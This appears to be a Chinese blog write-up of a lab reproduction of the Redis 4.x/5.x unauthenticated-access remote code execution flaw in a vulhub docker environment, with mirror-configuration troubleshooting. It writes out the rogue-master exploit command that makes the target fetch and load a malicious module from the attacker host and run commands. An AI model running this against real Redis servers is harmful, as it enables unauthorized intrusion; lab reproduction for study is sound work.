redis 4-unacc


Redis 4-unacc

测试环境

攻击者:192.168.229.129

靶机:192.168.229.137

运行环境

使用docker和docker-compose运行漏洞环境vulhub

1
2
3
4
进入vulhub中Redis的4-unacc目录
docker-compose build //对靶场进行编译
docker-compose up -d //运行靶场
docker-compose down //移除靶场

image-20210628210758753

安装Redis

攻击者也要安装Redis

1
2
3
4
5
6
1.wget http://download.redis.io/releases/redis-2.8.12.tar.gz #下载
2.tar -xzf redis-2.8.12.tar.gz #解压
3.cd到redis-2.8.12 目录下
4.输入命令make #安装
5.进入redis-2.8.12/src/目录下
6.输入命令`./redis-cli -h`,出现帮助内容就表示可以使用了

image-20210628131141013

nmap扫描

nmap可以扫描出靶机6379的Redis服务器

image-20210628142638144

Redis直接连接

可以使用kali中的Redis直接连接./redis-cli -h ip

使用info可以查看到一些服务器的敏感信息

image-20210628142952657

下载exp到本地

image-20210628143941751

make编译exp

cd到redis-rogue-server /RedisModulesSDK/exp/目录下,使用make进行编译,该目录下会多出exp.oexp.so两个文件

image-20210628144722979

image-20210628144753019

返回到redis-rogue-server.py目录下

./redis-rogue-server.py --rhost --lhost

image-20210724191619236

然后就卡住了。。

换了个exp

git clone https://github.com/vulhub/redis-rogue-getshell.git

image-20210628191840574

./redis-master.py -r 靶机IP -p 6379 -L 攻击机IP -P 8989 -f RedisModulesSDK/exp/exp.so -c "whoami"

image-20210724191339232

然后就又卡住了。。。

在新的靶机上搭建docker

vps不好用,搭了个本地的环境来演示

结果原来的阿里源不能用了,又折腾了半天换源。。(图中的是中科大的源也还是不行)

image-20210628203059513

最后也是糊里糊涂添加了一堆源

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
#阿里云
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
#清华大学
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
#163
deb http://mirrors.163.com/debian wheezy main non-free contrib
deb-src http://mirrors.163.com/debian wheezy main non-free contrib
deb http://mirrors.163.com/debian wheezy-proposed-updates main non-free contrib
deb-src http://mirrors.163.com/debian wheezy-proposed-updates main non-free contrib
deb-src http://mirrors.163.com/debian-security wheezy/updates main non-free contrib
#东软大学
deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib
deb-src http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib

然后就可以了。。。淦

直连成功

image-20210628204907522

./redis-master.py -r 192.168.229.137 -p 6379 -L 192.168.229.129 -P 8989 -f RedisModulesSDK/exp/exp.so -c "whoami"

image-20210628205215675

不过是eredis是什么鬼???

第一个exp也可以利用

image-20210628210157607

总结

感觉自己啥都没做,差太多了,还有

这里只是使用vulhub漏洞环境,只能通过该exp来getshell,像通过写文件、ssh key或定时计划来getshell,都是不成功的,会提示没有权限

考完就尝试另外三个方法

参考文章

Redis 4.x5.x 未授权访问漏洞EXP复现过程

Redis 4.x/5.x 未授权访问漏洞

redis 4-unacc 复现


文章作者: l0odrd
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 l0odrd !
  目录